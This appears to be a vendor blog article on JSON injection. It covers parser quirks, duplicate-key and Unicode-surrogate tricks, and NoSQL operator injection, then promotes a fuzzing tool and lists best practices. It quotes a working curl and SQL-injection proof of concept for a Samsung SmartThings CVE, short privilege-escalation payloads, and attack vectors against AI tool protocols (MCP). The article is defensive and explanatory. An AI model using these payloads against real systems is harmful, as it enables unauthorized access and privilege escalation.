Introduction

APIs are the critical glue of modern software architectures. JSON, the lingua franca between services, brings unity—but also risks. One of the most alarming real-world examples is the Samsung SmartThings Hub vulnerability (CVE‑2018‑3879). A seemingly innocuous POST to a /credentials endpoint led to:

JSON Injection → SQL Injection → Buffer Overflow → ROP → Full Root Compromise

‍

Because json-c tolerated both single- and double-quoted strings, attackers could escape JSON into SQL, and then write a ROP chain that executed with root privileges, earning a critical CVSS 9.9 score. This wasn't a freak accident, but a textbook demonstration of how fragile the trust in structured data can be.

‍

1. What Is JSON Injection?

Definition: JSON injection occurs when attackers supply crafted JSON payloads to manipulate application behavior, by altering logic, bypassing filters, or slipping harmful structures through parsing and reserialization. It’s not just about injecting harmful strings, it's about controlling the shape and interpretation of JSON.

Typical scenarios include:

• Server-side logic corruption: JSON data used in control flows or SQL queries without proper sanitation.
• Client-side injection: JSON parsed via eval() or injected through JSONP, causing XSS risks.
• Protocol manipulation: Attackers tune RPC or API behavior by abusing structured fields.

‍

Dana Epp defines it aptly:

"JSON injection is a vulnerability that allows an attacker to insert malicious data into JSON streams, potentially altering application behavior or triggering unintended actions."

‍

2. Why Parsers Are Dangerous

Despite RFC‑8259’s clarity, parser behaviors vary widely:

2.1 Duplicate Key Precedence

{ "bar": 1, "bar": 2 }

• Python → last wins (2)
• Go → first wins (1)

Attackers can exploit this by inserting duplicate keys that bypass frontend validation but override backend logic.

‍

2.2 Unicode Surrogate Truncation

Payload:

{"role": "user\uD888", "role": "admin"}

Some parsers treat these as distinct keys; others truncate or normalize them, collapsing to a single role field, allowing privilege escalation.

‍

2.3 Serialization Mismatch

Libraries like C++ RapidJSON may:

• Parse duplicates by last occurrence
• Serialize all entries, reintroducing duplicates back to the system

These quirks create parser/protocol “smuggling”, sending one set of logic upstream, another downstream.

‍

3. Exploitation Examples

3.1 Samsung SmartThings Hub (JSON → SQL → ROP)

An exploitable JSON injection vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17.

The video-core process incorrectly parses the user-controlled JSON payload, leading to a JSON injection which in turn leads to a SQL injection in the video-core database.

An attacker can send the following series of HTTP requests to trigger this vulnerability:

sInj='","_id=0 where 1=2;insert into camera values 
(123,replace(substr(quote(zeroblob((10000 + 1) / 2)), 
3, 10000), \\"0\\", \\"A\\"),1,1,1,1,1,1,1,1,1,1,1,1,1,1);--":"'

curl -X POST 'http://127.0.0.1:3000/credentials' 
-d "{'s3':{'accessKey':'','secretKey':'','directory':'',
'region':'','bucket':'','sessionToken':
'${sInj}'},'videoHostUrl':'127.0.0.1/'}"

curl -X DELETE "http://127.0.0.1:3000/cameras/123"

3.2 Role Escalation via Unicode

Suppose front-end validation rejects role = "admin" but not "admin\uD888". Using the surrogate key trick mentioned earlier, downstream logic concedes to an admin role because Unicode is stripped in parsing.

‍

3.3 Structured Format Injection (NoSQL/Mass Assignment)

{
 "username": "admin",
 "filters": { "$ne": null, "isAdmin": true }
}

Filters or serialization allowing polymorphic input can be abused to inject sensitive parameters. e.g., forcing admin access or exposing hidden API functions.

This is akin to the Mass Assignment issue in ORMs, where unexpected JSON keys leak right into internal handling.

‍

4. MCP (Model Context Protocol): JSON at Risk

MCP is a JSON-RPC 2.0 based protocol emerging in AI toolspaces (OpenAI Agents, Claude Desktop, Replit). It structures data for dynamic tool invocation .

Typical MCP payload:

{
 "jsonrpc": "2.0",
 "id": "req1",
 "method": "runTool",
 "params": {
   "toolID": "summarize",
   "input": {"text": "..."},
   "options": {}
 }
}

‍

Attack vectors:

• Duplicate "method" keys to hijack the code path
• Injected boolean flags (e.g., "options": {"admin": true}) changing permitted actions
• Unicode traps in toolID or hidden instructions

‍

Several academic findings corroborate these vulnerabilities, prompt injection, tool poisoning, and preference manipulations using malformed/multiplied keys.

‍

5. Fuzzing JSON: Defensive Strategy

Fuzzing is key to detecting JSON injection flaws across the stack:

5.1 Mutation-Based Fuzzing

Start with valid payloads, then:

• Add duplicate fields
• Inject Unicode surrogates
• Switch types ("field": "true" ⇒ boolean true)

‍

5.2 Grammar-Based Generation

Generate invalid-but-JSON-compliant sequences:

• Inline comments in JSON5
• Large-depth nesting
• Mixed-type arrays/objects

‍

5.3 Protocol-Specific Techniques

For MCP:

• Mutate "method" and "params" structure
• Insert unauthorized key/value pairs
• Duplicate critical parameters (e.g., IDs, tool options)

These vectors stress-test parser consistency and application logic boundaries.

‍

6. How Penzzer Detects JSON Injection

Penzzer is a context-aware, multi-layer fuzzing solution tailored to JSON APIs and protocol ecosystems like MCP. Its primary capabilities include:

1. Semantic Payload Generation
   • Adds duplicate keys, Unicode surrogates, type variations
   • Honors API schema (field names, types, depth)
2. Protocol-Aware Behavior
   • Recognizes JSON-RPC formats; fuzzes "method", "params" fields
   • Enumerates all MCP tool invocations
3. Full-Stack Traversal
   • Injects payloads into HTTP endpoints
   • Runs through client (JavaScript, native), backend, DB layers
   • Collects discrepancies in parsing or behavior
4. Detection and Scoring
   • Flags based on status codes, response anomalies, unexpected outputs
   • Correlates anomalies with injected mutations
5. CI/CD Integration
   • Fits into pipeline for continuous testing
   • Highlights JSON injection vectors before production deployment

‍

Key value of Penzzer lies in its ability to detect deep JSON propagation issues, where structured misinterpretation happens across layers and services.

‍

7. Benefits of JSON Injection Testing

• Privilege escalation prevention: catch admin-level misassignments
• Logical integrity: ensure backend doesn't diverge from frontend contracts
• Protocol safety: detect tool-hijacking or command execution in MCP
• Compliance and resilience: validate parser consistency against attacker fuzzing

Testing early prevents production-level exposure to multi-step injections or logic alteration.

‍

8. Best Practices for JSON Security

1. Prevent duplicate keys in parsers (use strict JSON compliance modes)
2. Reject or sanitize Unicode pitfalls (especially surrogate pairs)
3. Schema validation (e.g., JSON Schema) to reject unexpected keys or incorrect types
4. Never use eval() or JSONP for parsing; use JSON.parse() or strict libraries
5. Use trusted libraries with documented JSON compliance
6. Fuzz test regularly, especially after schema updates or new API endpoints
7. Audit MCP servers and clients, checking for prompt injection or tool poisoning vulnerabilities